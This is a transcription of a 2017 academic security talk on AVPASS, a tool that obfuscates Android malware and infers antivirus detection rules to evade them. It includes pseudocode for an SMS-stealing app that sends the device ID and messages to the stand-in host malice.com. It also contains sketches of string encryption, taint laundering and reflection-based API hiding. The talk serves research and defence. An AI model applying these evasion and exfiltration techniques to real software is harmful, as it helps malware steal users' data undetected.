Transcription

AVPASS: Automatically Bypassing Android Malware Detection System
Jinho Jung, Chanil Jeon, Max Wolotsky, Insu Yun, and Taesoo Kim
Georgia Institute of Technology, July 27, 2017

About Us
- SSLab (@GT): focusing on system and security research
  https://sslab.gtisc.gatech.edu/
- ISTC-ARSA: Intel Science & Technology Center for Adversary-Resilient Security Analytics, strengthening the analytics behind malware detection
  …ia-tech/

In This Talk, We Will Introduce AVPASS
- Transforms any Android malware to bypass AVs
  - By inferring AV features and rules
  - By obfuscating the Android binary (APK)
- Yet supports preventing code leakage

Trend: Android Dominates Mobile OS Market
- Android still leads the mobile market
- Regained share over iOS to achieve an 86 percent […]
Source: …ww.gartner.com/newsroom/id/3415117

Problem: Android Malware Becomes More Prevalent
- 8,400 new Android malware samples every day
- Security experts expect around 3.5 million new Android malware apps for […]
Source: …12-8-400-new-android-malware-samples-every-day

One Solution: Protecting Mobile Devices with Anti-Virus
- There are over 50 Android anti-virus products in […]
Source: …devices/

Unfortunately, AV Solutions Are Known to Be Weak (example: Java malware)
* Developing Managed Code Rootkits for the Java Runtime Environment, Benjamin Holland, DEF CON 24

What About Android Malware?
[Figure labels: Malware, "Malware!"]

What About Android Malware?
- How easy is it to bypass AV software?
[Figure labels: Malware, "Malware!", Benign App]

Challenges: Bypassing Unknown AV Solutions
① Transforming without destroying malicious features
② No prior knowledge of AV features
③ Interacting without leaking own malicious features
[Figure labels: Malware, "Malware!", Benign App]

Approaches: Automatically Inferring and Obfuscating Detection Features
- Obfuscating individual features
- Inferring features and detection rules of AVs
- Bypassing AVs by using inferred features and rules
  - Yet minimizing information leakage by sending fake malware

Summary of AVPASS Operation
- Bypassed most AVs, with 3.42 / 58 (5.8%) average detections
- Discovered 5 strong-, 3 normal-, and 2 weak-impact features of AVs
- Discovered bypassing rule combinations (about 30%)
- Prevented code leakage when querying by using Imitation Mode

AVPASS Overview and Workflow
① Binary obfuscation
② Inferring features & rules
③ Query safely
[Figure labels: Malware, Disguised & Bypass]

What is Binary Obfuscation?
- Application features: Method, API, String, Variable, Payload, Package, Interaction, Data-flow, Resource, Class
- Obfuscation: encrypt & remove features
- Obfuscated application: "I look different, but maintain the same behaviors"

Main Obfuscation Features
No.  Obfuscation primitive                        Side effects
1    Component interaction injection              N/A
2    Dataflow analysis avoiding code injection    N/A
3    String encryption                            N/A
4    Variable name encryption                     N/A
5    Package name encryption                      N/A
6    Method and class name encryption             N/A
7    Dummy API and benign class injection         N/A
8    Bytecode injection                           N/A
9    Java reflection transformation               N/A
10   Resource encryption (xml and image)          Appearance

APK Obfuscation Requirements
- Ensure the APK's original functionality
  - Error-free "smali" code injection
    * smali: disassembled code of DEX format
- Should be difficult to de-obfuscate or reverse
  - Increase obfuscation complexity
  - E.g., hide all APIs by using Java reflection
  - E.g., encrypt all strings with different encryption keys
  - E.g., apply obfuscation multiple times
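
The "different encryption keys" requirement can be illustrated with a minimal sketch. It assumes a repeating-key XOR as a stand-in cipher, and the helper names `encrypt_strings` and `decrypt_entry` are hypothetical; the slides do not say which cipher or key scheme AVPASS actually uses.

```python
import os


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR data with a repeating key (stand-in cipher, chosen only for brevity)."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def encrypt_strings(strings, key_len=8):
    """Encrypt every string under its own freshly generated key.

    Returns a list of (ciphertext, key) pairs, one pair per input string.
    """
    table = []
    for s in strings:
        key = os.urandom(key_len)  # a different random key for each string
        table.append((xor_bytes(s.encode("utf-8"), key), key))
    return table


def decrypt_entry(ciphertext: bytes, key: bytes) -> str:
    """Recover the original string at run time from its (ciphertext, key) pair."""
    return xor_bytes(ciphertext, key).decode("utf-8")


table = encrypt_strings(["sms", "http://malice.com"])
recovered = [decrypt_entry(c, k) for c, k in table]
```

Because no key is shared, recovering one string reveals nothing about the others, which is the point of the requirement.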

Easy Problem: Available Number of Registers
Before injection:
    .method public DoSomething()
        .locals 4
        # register: v0 – v3 used here
    .end method
After injection (TryInjection):
    .method public DoSomething()
        .locals 5 (+1)
        # register: v1 – v4 used here
        # code injection using v0
    .end method
Registers: v0 v1 v2 v3 → v0 v1 v2 v3 v4
- Increase the maximum number and shift all registers and parameters

Tricky Problem: Limited Number of Registers
Before injection (total: 14 registers):
    .method public DoSomething(p0 – p9)
        .locals 4
        # register: v0 – v3 used here
        # parameter: p0 – p9 used here
    .end method
After injection (TryInjection; total: 17 registers):
    .method public DoSomething(p0 – p9)
        .locals 7 (+3)
        # register: v0 – v3 used here
        # parameter: p0 – p9 used here
        # instruction using p9 (v16)
    .end method
- Instruction range error (> v15)
Register layout: v0 – v3, p0 (v4) … p9 (v13) → v0 – v6, p0 (v7) … p9 (v16)

Solution: Backup and Restore Before Injection
Before injection:
    .method public DoSomething(p0 – p9)
        .locals 4
        # register: v0 – v3 used here
        # parameter: p0 – p9 used here
    .end method
After injection (TryInjection):
    .method public DoSomething(p0 – p9)
        .locals 7 (+3)
        # register: v0 – v3 used here
        # parameter: p0 – p9 used here
        ① backup register v3 – v12
        ② code injection using v0 – v2
        ③ restore register v3 – v12
    .end method
[Figure: register layout showing the backup and restore of v3 – v12]
- Why tricky? AVPASS needs to trace the type of each register during backup and restore
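
The register arithmetic behind the easy and tricky cases can be checked with a small sketch. It relies on two Dalvik facts: parameters occupy the highest registers of a method, and many instructions encode a register in 4 bits (v0 – v15). The function names are hypothetical and this is not AVPASS's own code.

```python
MAX_4BIT_REGISTER = 15  # many Dalvik instructions can only address v0 - v15


def param_register(locals_count: int, param_index: int) -> int:
    """Parameters follow the locals, so pN is the same register as v(locals + N)."""
    return locals_count + param_index


def injection_is_safe(locals_count: int, param_count: int, extra_locals: int) -> bool:
    """True if the last parameter is still 4-bit addressable after adding locals."""
    last_param = param_register(locals_count + extra_locals, param_count - 1)
    return last_param <= MAX_4BIT_REGISTER


# Tricky case from the slide: .locals 4 -> .locals 7 with parameters p0 - p9.
before = param_register(4, 9)           # p9 is v13, still addressable
after = param_register(7, 9)            # p9 becomes v16, out of 4-bit range
tricky_ok = injection_is_safe(4, 10, 3)
# Easy case: a method with few registers tolerates one extra local.
easy_ok = injection_is_safe(4, 1, 1)
```

When the check fails, simply raising `.locals` is not enough, which is why the slide falls back to backing up and restoring registers around the injected code.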

Difficult to Reverse as Requirement
- Too easy to detect obfuscation?
  - True, but it doesn't help AVs much
  - How could you tell benign from malicious?
- Dynamic analysis can detect original behavior
  - However, code coverage is another challenge
  - Not that practical due to overhead

Example: Difficult to Reverse
    public class SendToNetwork (Service) {
        public void onStartCommand( Intent ) {
            String SMSmsg = intent.get("sms");
            TelephonyMgr tm = new TelephonyMgr();
            String ID = tm.getDeviceID();
            String output = ID.concat(SMSmsg);
            URL url = new URL("http://malice.com");
            url.sendData(output);
        }
    }

Example: Difficult to Reverse
    public class SendToNetwork (Service) {
        public void onStartCommand( Intent ) {
            String SMSmsg = intent.get("sms");           // Reflection1
            TelephonyMgr tm = new TelephonyMgr();        // Reflection2
            String ID = tm.getDeviceID();                // Reflection3
            String output = ID.concat(SMSmsg);           // Reflection4
            URL url = new URL("http://malice.com");      // String Enc1
            url.sendData(output);                        // Reflection5
        }
    }
- Reflection Wrapper1 – Wrapper4: each holds a classname and a methodname
- String Encryptor1: holds the encrypted message and the decryption key

Example: Difficult to Reverse
[Same annotated SendToNetwork code as in the previous build: Reflection1 – Reflection5 and String Enc1]
- Reflection Wrapper1 – Wrapper5: the classname and methodname strings of each wrapper are themselves encrypted (String Enc2 – String Enc11)
- String Encryptor1: its encrypted message and decryption key are encrypted as well (String Enc12, String Enc13)

Example: Difficult to Reverse
[Same annotated SendToNetwork code and wrappers as in the previous build: Reflection1 – Reflection5, Reflection Wrapper1 – Wrapper5, String Enc1 – String Enc13]
- Further rounds of string encryption are layered on top: String Enc14, String Enc15, …, String Enc N, N+1, N+2, N+3, N+4, N+5
- Yes, you can tell there is obfuscation here, but it is difficult to reverse

Start with Well-known Detection Techniques
- API-based detection
- Dataflow-based detection
- Interaction-based detection
- Signature-based detection

Android Malware Example
- SMS-leaking malware
- Components: InterceptSMS, SendToNetwork
- SMS received → SMS intercepted by background Service → hacker sends the intercepted message (leaked information) to malice.com

API-based Android Malware Detection
Component: InterceptSMS
    public class InterceptSMS (BroadcastReceiver) {
        public void onReceive( ) {
            SmsMessage msg = SmsMessage.create();
            String SMS = msg.getMessageBody();
            Intent si = new Intent(Malicious.class);
            si.putExtra("sms", SMS);
            startService(si);
        }
    }
Component: SendToNetwork
    public class SendToNetwork (Service) {
        public void onStartCommand( Intent ) {
            String SMSmsg = intent.get("sms");
            TelephonyMgr tm = new TelephonyMgr();
            String ID = tm.getDeviceID();
            String output = ID.concat(SMSmsg);
            URL url = new […]
        }
    }
- Suspicious API sequence (n-gram)

Dataflow-based Android Malware Detection
Component: InterceptSMS
    public class InterceptSMS (BroadcastReceiver) {
        public void onReceive( ) {
            SmsMessage msg = SmsMessage.create();
            String SMS = msg.getMessageBody();
            Intent si = new Intent(Malicious.class);
            si.putExtra("sms", SMS);
            startService(si);
        }
    }
Component: SendToNetwork
    public class SendToNetwork (Service) {
        public void onStartCommand( Intent ) {
            String SMSmsg = intent.get("sms");
            TelephonyMgr tm = new TelephonyMgr();
            String ID = tm.getDeviceID();          // Suspicious Source
            String output = ID.concat(SMSmsg);
            URL url = new […]                      // Suspicious Sink
        }
    }
- Suspicious dataflow

Interaction-based Android Malware Detection
Component: InterceptSMS
    public class InterceptSMS (BroadcastReceiver) {
        public void onReceive( ) {
            SmsMessage msg = SmsMessage.create();
            String SMS = msg.getMessageBody();
            Intent si = new Intent(Malicious.class);
            si.putExtra("sms", SMS);
            startService(si);
        }
    }
Component: SendToNetwork
    public class SendToNetwork (Service) {
        public void onStartCommand( Intent ) {
            String SMSmsg = intent.get("sms");
            TelephonyMgr tm = new TelephonyMgr();
            String ID = tm.getDeviceID();
            String output = ID.concat(SMSmsg);
            URL url = new URL("http://malice.com");
            url.sendData(output);
        }
    }
- Suspicious interaction between the two components

Signature-based Android Malware Detection
Component: InterceptSMS
    public class InterceptSMS (BroadcastReceiver) {
        public void onReceive( ) {
            SmsMessage msg = SmsMessage.create();
            String SMS = msg.getMessageBody();
            Intent si = new Intent(Malicious.class);
            si.putExtra("sms", SMS);
            startService(si);
        }
    }
Component: SendToNetwork
    public class SendToNetwork (Service) {
        public void onStartCommand( Intent ) {
            String SMSmsg = intent.get("sms");
            TelephonyMgr tm = new TelephonyMgr();
            String ID = tm.getDeviceID();
            String output = ID.concat(SMSmsg);
            URL url = new […]
        }
    }
- Signatures: Class, Variable, String, Package, etc.

Bypassing API-based Detection System
- Break frequency analysis
  - Massive API insertion to change the number of APIs
- Break n-gram (sequence) analysis
  - Insert dummy APIs between existing APIs
- Break API transition ratio analysis
  - Transition ratio? java → android, java.lang → android.util
  - 1) Insert massive APIs or 2) change package names

Bypassing API-based Detection System (1/2)
- Break n-gram analysis
- Before: getDeviceID() → concat() → sendData()
    public class SendToNetwork (Service) {
        public void onStartCommand( Intent ) {
            String SMSmsg = intent.get("sms");
            TelephonyMgr tm = new TelephonyMgr();
            String ID = tm.getDeviceID();
            android.text.format.DateFormat() // DUMMY
            String output = ID.concat(SMSmsg);
            android.text.format.DateFormat() // DUMMY
            URL url = new […]
        }
    }
- After: getDeviceID() → DateFormat() → concat() → DateFormat() → sendData()
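
The effect of the dummy calls on n-gram features can be reproduced with a short sketch. The call names come from the slide; the helpers `ngrams` and `insert_dummy` are illustrative and are not part of AVPASS.

```python
def ngrams(seq, n):
    """Return the set of length-n windows over an API call sequence."""
    return {tuple(seq[i:i + n]) for i in range(len(seq) - n + 1)}


def insert_dummy(seq, dummy):
    """Place one dummy call between every pair of adjacent original calls."""
    out = []
    for i, call in enumerate(seq):
        if i:
            out.append(dummy)
        out.append(call)
    return out


original = ["getDeviceID", "concat", "sendData"]
obfuscated = insert_dummy(original, "DateFormat")

# No 2-gram of the original sequence survives in the obfuscated one.
shared_bigrams = ngrams(original, 2) & ngrams(obfuscated, 2)
```

A detector keyed on the original 2-grams or 3-grams finds none of them in the rewritten sequence, even though all three original calls still run in the same order.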

Bypassing API-based Detection System (2/2)
- Break transition ratio analysis
- Before: user-defined() → java.lang(String) → user-defined()
    public class SendToNetwork (Service) {
        public void onStartCommand( Intent ) {
            String SMSmsg = intent.get("sms");
            userDefined1 tm = new TelephonyMgr();
            String ID = tm.getDeviceID();
            String output = ID.concat(SMSmsg);
            userDefined2 url = new […]
        }
    }
- After: java.util.user-defined() → java.lang(String) → java.util.user-defined()
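
A rough sketch of why renaming packages shifts the transition ratios follows. The family labelling rule and the class names (`com.mal.Helper1`, `java.util.Helper1`) are assumptions made for illustration; the slides do not specify how the targeted detector assigns families.

```python
from collections import Counter


def family(name: str) -> str:
    """Hypothetical labelling: the first package component, or 'user' otherwise."""
    head = name.split(".")[0]
    return head if head in {"java", "android"} else "user"


def transition_ratios(calls):
    """Share of each family-to-family transition between consecutive calls."""
    fams = [family(c) for c in calls]
    counts = Counter(zip(fams, fams[1:]))
    total = sum(counts.values())
    if total == 0:
        return {}
    return {pair: n / total for pair, n in counts.items()}


before = ["com.mal.Helper1", "java.lang.String", "com.mal.Helper2"]
after = ["java.util.Helper1", "java.lang.String", "java.util.Helper2"]

ratios_before = transition_ratios(before)
ratios_after = transition_ratios(after)
```

Moving the user-defined classes under a `java.util` name collapses the user ↔ java transitions into java → java, so a ratio-based model sees a different profile for the same behavior.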

Bypassing Dataflow-based Detection System (1/2)
- Explicit → implicit dataflow
- Before: SMSmsg, ID → output (tracked)
    public class SendToNetwork (Service) {
        public void onStartCommand( Intent ) {
            String SMSmsg = intent.get("sms");
            TelephonyMgr tm = new TelephonyMgr();
            String ID = tm.getDeviceID();
            untrackedStr = anti-dataflow-analysis-code(ID)   // implicit flow
            String output = untrackedStr.concat(SMSmsg);
            URL url = new URL("http://malice.com");
            url.sendData(output);
        }
    }
- After: SMSmsg, untrackedStr → output (untracked)
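
One well-known way to turn an explicit flow into an implicit one is to rebuild the value through branches only. The sketch below illustrates that general idea; the function name `launder` and the fixed alphabet are assumptions, and this is not the code AVPASS injects.

```python
import string

ALPHABET = string.printable  # candidate characters; anything else is dropped


def launder(tainted: str) -> str:
    """Rebuild `tainted` so that no character is ever copied from it directly.

    The tainted value only decides which branch is taken; every character
    appended to the result originates from ALPHABET.
    """
    clean = []
    for ch in tainted:
        for candidate in ALPHABET:
            if ch == candidate:          # control dependence only
                clean.append(candidate)  # data comes from the constant alphabet
                break
    return "".join(clean)


device_id = "356938035643809"
untracked = launder(device_id)
```

A tracker that follows only assignments and call arguments sees `untracked` as derived from a constant, while the content is identical to the source value.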

Bypassing Dataflow-based Detection System (2/2)
- Java reflection (API name hiding)
    public class SendToNetwork (Service) {
        public void onStartCommand( Intent ) {
            String SMSmsg = intent.get("sms");
            TelephonyMgr tm = new TelephonyMgr();
            String ID = tm.getDeviceID();
            String ID = ReflectionWrapper1();     // nothing to trace
            String output = ID.concat(SMSmsg);
            URL url = new URL("http://malice.com");
            url.sendData(output);
        }
    }
- Unable to track the suspicious source API
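
The name-hiding idea can be sketched as a Python analogue of a Java reflection wrapper: the module and function names are stored encoded and resolved only at run time. The single-byte XOR encoding, the `reflective_call` helper, and the harmless `math.sqrt` target are all illustrative assumptions.

```python
import importlib


def decode(blob: bytes, key: int) -> str:
    """Undo the single-byte XOR used to hide a name (stand-in encoding)."""
    return bytes(b ^ key for b in blob).decode("ascii")


def reflective_call(enc_module: bytes, enc_attr: bytes, key: int, *args):
    """Resolve a module and a function from encoded names, then call the function."""
    module = importlib.import_module(decode(enc_module, key))
    return getattr(module, decode(enc_attr, key))(*args)


KEY = 0x5A
# A real tool would embed only the encoded bytes; they are computed here
# from the plain names so that the example stays self-contained.
ENC_MODULE = bytes(b ^ KEY for b in b"math")
ENC_ATTR = bytes(b ^ KEY for b in b"sqrt")

result = reflective_call(ENC_MODULE, ENC_ATTR, KEY, 16.0)
```

The call site names neither the module nor the function, so a static scan for a sensitive API name has nothing to match.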

Bypassing Interaction-based Detection System
Component: InterceptSMS
    public class InterceptSMS (BroadcastReceiver) {
        public void onReceive( ) {
            SmsMessage msg = SmsMessage.create();
            String SMS = msg.getMessageBody();
            Intent si = new Intent(Malicious.class);
            si.putExtra("sms", SMS);
            startService(si);
        }
    }
Component: SendToNetwork
    public class SendToNetwork (Service) {
        public void onStartCommand( Intent ) {
            String SMSmsg = intent.get("sms");
            TelephonyMgr tm = new TelephonyMgr();
            String ID = tm.getDeviceID();
            String output = ID.concat(SMSmsg);
            URL url = new URL("http://malice.com");
            url.sendData(output);
        }
    }
- Suspicious interaction between the two components

Bypassing Interaction-based Detection System
Component: InterceptSMS
    public class InterceptSMS (BroadcastReceiver) {
        public void onReceive( ) {
            SmsMessage msg = SmsMessage.create();
            String SMS = msg.getMessageBody();
            Intent si = new Intent(Malicious.class);
            si.putExtra("sms", SMS);
            startService(si);
        }
    }
Component: SendToNetwork
    public class SendToNetwork (Service) {
        public void onStartCommand( Intent ) {
            String SMSmsg = intent.get("sms");
            TelephonyMgr tm = new TelephonyMgr();
            String ID = tm.getDeviceID();
            String output = ID.concat(SMSmsg);
            URL url = new […]
        }
    }
[Figure label: #1]
- Divide components and make a new relation to nullify the analysis

Evaluation: Bypassing Well-known Detection System
API-based detection (ratio-based)
Category                         Strategy                                                         Bypass ratio
API transition ratio detection   Inject dummy APIs to make diff. ratio (up to 2,000 insertions)   80%
                                 Modify all family/package names                                  95%

Evaluation: Bypassing Well-known Detection System
API-based detection (ratio-based)
Category                         Strategy                                                         Bypass ratio
API transition ratio detection   Inject dummy APIs to make diff. ratio (up to 2,000 insertions)   80%
                                 Modify all family/package names                                  95%
* If the malware is big, you should inject many more APIs

Evaluation: Bypassing Well-known Detection System
Dataflow-based detection
Category            Strategy                                                                    Bypass ratio
Dataflow tracking   Inject anti-dataflow-analysis code (support: String and Cursor datatype)   34%
                    Hide API name by using reflection                                           100%
Interaction-based detection
- Successfully disguised 100% of malware

Evaluation: Bypassing Well-known Detection System
Dataflow-based detection
Category            Strategy                                                                    Bypass ratio
Dataflow tracking   Inject anti-dataflow-analysis code (support: String and Cursor datatype)   34%
                    Hide API name by using reflection                                           100%
* As you can see, the success ratio of the injected code is low. Anti-dataflow-analysis code is difficult to write and easy to detect.
Interaction-based detection
- Successfully disguised 100% of malware

Demo #1
- Bypass API-based detection system
- Bypass dataflow-based detection system
- Bypass interaction-based detection system

Let's move on to real-world detection systems

New Target: Real-World Unknown AVs
- Target: VirusTotal
  * Aggregation of many antivirus products and online scan engines to check for viruses
- Questions
  - Which features are important?
  - Which combinations affect the result?
  - Which classifier are they using?
  - Are they robust enough to detect variations?

Strategy: How to Infer and Bypass AVs?
- Inferring each feature's impact
  - Obfuscate individual features and then query
- Inferring detection rules
  - Generate all possible variations and then query
- Reduce the number of queries
  - Group similar / relevant obfuscations
- Provide a way to query safely
  - Query by using fake (but similar) malware

Inferring Features: What Are AVs Looking at?
- Process for eliminating unnecessary obfuscation
- We need to "guess" possible features
  - Byte stream? Hash of image? IDs in resource? API and its arguments?
- How?
  - Obfuscate individual features and analyze the result

Finding: Inferred Features
No.  Obfuscation primitive                        Impact observed
1    Component interaction injection              No
2    Dataflow analysis avoiding code injection    No
3    String encryption                            Strong
4    Variable name encryption                     Normal
5    Package name encryption                      Strong
6    Method and class name encryption             Strong
7    Dummy API and benign class injection         Normal
8    Bytecode injection                           Weak
9    Resource encryption (xml and image)          Weak
10   Dropper payload (jar or APK)                 Strong
11   Permissions                                  Normal
12   API name hiding                              Strong

Inferring Rules: Finding Feature Combinations to Bypass
- Process for finding the detection rules / logic inside
- Why infer?
  - To bypass with minimum obfuscations
  - To generate disguised malware with essential obfuscations
- How?
  - Obfuscate features and query variations

2^k Factorial Experiment Design
* With k factors (features), decide whether to 1) maintain the kth factor or 2) obfuscate the kth factor
- Obfuscation groups (example) O1 – O7, covering: String, Variable, Package, Class, API injection, Resource, Dropper removal, Permission removal, API hiding
- 2^k variations (2^7 = 128)
- Test with 100 malware? 100 x 128 x 2 way = 25,600 queries
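
The variation count and the query budget on this slide can be reproduced with a short sketch. The group names O1 – O7 follow the slide; the `ways` parameter stands for the slide's "2 way" factor, whose meaning the transcript does not explain, and the function names are illustrative.

```python
from itertools import product

GROUPS = ["O1", "O2", "O3", "O4", "O5", "O6", "O7"]


def variations(groups):
    """Yield every keep/obfuscate assignment: 2**k dicts for k groups."""
    for mask in product([False, True], repeat=len(groups)):
        yield dict(zip(groups, mask))  # True means "obfuscate this group"


def query_count(num_samples: int, k: int, ways: int = 2) -> int:
    """Total number of queries for a full 2^k design over num_samples samples."""
    return num_samples * 2 ** k * ways


all_variations = list(variations(GROUPS))
total_queries = query_count(100, len(GROUPS))
```

The count doubles with every added group, which is why grouping similar obfuscations is needed to keep the number of queries manageable.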

2^k Factorial Experiment Design
- E.g., test the "string + package + resource" combination
- E.g., test "order" to know the impact of features (1 → 3 → 7 → 6 …)
[Figure: obfuscation groups O1 – O7]

Inferred Rules: Must-do Obfuscations to Bypass
[Table: numbered rules (up to 18) against the feature columns STR, VAR, PACK, CLASS/INJ, RES, PERM, and API, for Anti-virus (T), weak detection, and Anti-virus (K), strong detection; the individual cell marks did not survive transcription]
V: bypassed when these features were obfuscated
* Experiment in May 2017; tested with 130 malware and 16,000 variations

Observation About Inferred Rules
- Most AVs use all (7 groups of) features for detection
- Inferred rules are about 30% of all possible combinations
- Better AVs have more complicated rules

How to Query Safely?
- Should minimize the information sent
- Should not send real code; send similar code instead
- Don't worry about the APK's functionality when querying

Imitation Mode
- Imitation Mode: mimicking malware when querying
- Benefits of imitation
  - Empty application template
  - Generate malware with selected features
  - Query without the entire code
[Figure: from malware with features O1 – O7, Imitation #1 (O1, O2) is reported BENIGN and Imitation #2 (O1, O3) is reported MALICIOUS]
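
The querying loop behind Imitation Mode can be sketched with a mock verdict function. Everything here is hypothetical: `mock_av` stands in for a real scan result and is wired to reproduce the figure (O1 + O2 benign, O1 + O3 malicious), and `detected_combinations` is an illustrative helper rather than an AVPASS function.

```python
from itertools import combinations


def mock_av(features) -> bool:
    """Stand-in verdict: flags any template that carries both O1 and O3."""
    return {"O1", "O3"} <= set(features)


def detected_combinations(features, oracle, min_size=2, max_size=None):
    """Query the oracle with every feature subset and keep the ones it flags."""
    max_size = max_size or len(features)
    hits = []
    for size in range(min_size, max_size + 1):
        for combo in combinations(features, size):
            if oracle(combo):  # one imitation template per combination
                hits.append(combo)
    return hits


imitation_1 = mock_av(("O1", "O2"))
imitation_2 = mock_av(("O1", "O3"))
hits = detected_combinations(["O1", "O2", "O3"], mock_av)
```

Only feature combinations placed in an empty template are submitted, so the real malware code never leaves the developer's machine.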

Putting it All Together
- Malware development scenario with AVPASS
① Binary rewriting obfuscations
② Imitation Mode (inferred features & rules)
③ Developer modification
[Figure labels: Malware, Disguised & Bypass]

Evaluation: Bypassing AVs
General bypass ability
Category             Avg. detections   Detection ratio
Average detections   38 / 58           65%
After AVPASS         3.42 / 58         5.8%
* Experiment in July 2017; tested with 2,000 malware
Important features when bypassing or being detected
- To bypass: API, Package name, Class name
- To be detected: String, API, Package name

Evaluation: Bypassing AVs
Obfuscation vs. inferred rule combinations
Category                     Avg. detections   Ratio
Full obfuscations            8 / 58            13%
Inferred rules (about 30%)   10 / 58           17%
* Experiment in May 2017; tested with 130 malware and 16,000 variations
Imitation Mode detection
Category                                               Avg. detections
Full obfuscation                                       8 / 58
Imitation mode detected (2 - 7 features combination)   6.2 / 58
* Experiment in May 2017; tested with 100 malware and 12,000 variations

Why not 100% Bypass?
- Obfuscation cannot modify some contents
  - [Ex1] Permission: uses-permission and android:permission
  - [Ex2] Intent-filter: action, category, data, etc.
- AVPASS might miss possible features that AVs use
- However, Imitation Mode will tell you about detection

Findings: Observed Behaviors of AVs
- Static vs. dynamic analysis-based detection
  - No dynamic analysis-based detection was found (because AVs should yield results within minutes through VirusTotal)
- AVs mainly detect by pattern matching
  - Lack of advanced techniques (e.g., dataflow or interaction analysis)
  - 50% of AVs only use hash values
- Ahnlab 1) / WhiteArmor 2) showed the best detection (May 2017)
- After Java reflection, QuickHeal 3) / WhiteArmor were best (July 2017)
1) http://www.ahnlab.com
2) http://www.whitearmor.ai
3) http://www.quickheal.co.in/

Feedback from AV Companies (How could you detect so well?)
- Ahnlab: no response
- WhiteArmor: "Our detection uses composite models. Sorry for the limited information I can give you. As you know, the enemy is in the dark."
- QuickHeal: no response

Demo #2
- Infer features and rules of AVs
- Bypass AVs
- Safe query by using Imitation Mode

Discussion: Which AVs are Difficult to Bypass?
- Thorough analysis and pattern matching
  - Stronger AVs check more features and signatures
- Complex rule combinations
  - In general, good AVs have more detection rules
  - Detection ratio vs. false positives
- Dataflow-based and interaction-based detection
  - AVPASS can bypass them, but our pattern is too obvious
  - Difficult to re-develop anti-analysis code

Discussion: AVPASS vs. De-obfuscation
- Research on detection of obfuscated malware
- De-obfuscation techniques
  - Dynamic analysis based
  - Probabilistic analysis based
- DeGuard test result
  - Recovers 70% of class names (without AVPASS's reflection)
  - Cannot recover other obfuscations
http://apk-deguard.com/

Discussion: Defensive Measures
- Additional category of return value
  - Introduce a "NOT VALID" output
- Increase the number of features for detection
  - Prevent model inference by Imitation Mode
- Active intervention of a middle-man
  - Detect inferring behavior and impose a penalty

Discussion: AVPASS Limitations
- Malware with payload (e.g., apk/elf dropper or native libs)
  - Put everything within a class, not an external file → AVPASS will handle it
- AVPASS as a malicious pattern (after open-sourcing)
  - Name encryption: generic, difficult to detect
  - Code insertion: could be a malicious signature, difficult to re-develop
- Dynamic analysis
  - Can resolve some obfuscations: encrypted strings, dummy APIs, …

Discussion: AVPASS Limitations
- Malware with payload (e.g., apk/elf dropper or native libs)
  - Develop within your code (class), not an external file → AVPASS will handle it
- AVPASS as a malicious pattern (after open-sourcing)
  - Name encryption: generic, difficult to detect
  - Code insertion: could be a malicious signature, difficult to re-develop
  - Detected "HelloWorld" (template name) as malicious after 15 – 20K queries (20170517)
  - Now AV companies share signatures (20170719)
- Dynamic analysis
  - Can resolve some obfuscations: encrypted strings, dummy APIs, …


Actually, We Are Conducting Two Research Projects
- Separate research into "Attack" and "Defense"
  - AVPASS: "How to bypass?"
  - DEFENSE: "How to detect malware variations?"
- Intel Labs developed an Android malware detection platform
  - Incorporates both static and dynamic analysis
  - Emulation-based analysis reveals some obfuscations

Intel Android Malware Detection Platform
[Screenshots: Sign up, Upload APK]
* Upload and select classifier
* Check classified result and emulated […]

Future Work
- More sophisticated obfuscation and more tests
  - More feature discovery, increased success ratio, …
  - Test on Google Verify Apps, independent AV solutions, …
- Incremental improvement of bypassing ability
  - By conducting separate research
- Windows version of AVPASS
  - Robust binary rewriting technique is required
  - Inferring detection rules on more advanced AVs

AVPASS is Available Now
- Source code: https://github.com/sslab-gatech/avpass
- Intel Android malware analysis platform: send mail to [email protected], then we will let you in
- Contact points
  - AVPASS: Jinho Jung ([email protected])
  - Malware Analysis System: Mingwei Zhang ([email protected])

Conclusion
- Bypassed most AVs and found limitations (cannot bypass all)
- Discovered features and rule combinations of AVs
- Proposed Imitation Mode to prevent code leakage
- Provided AVPASS as open source
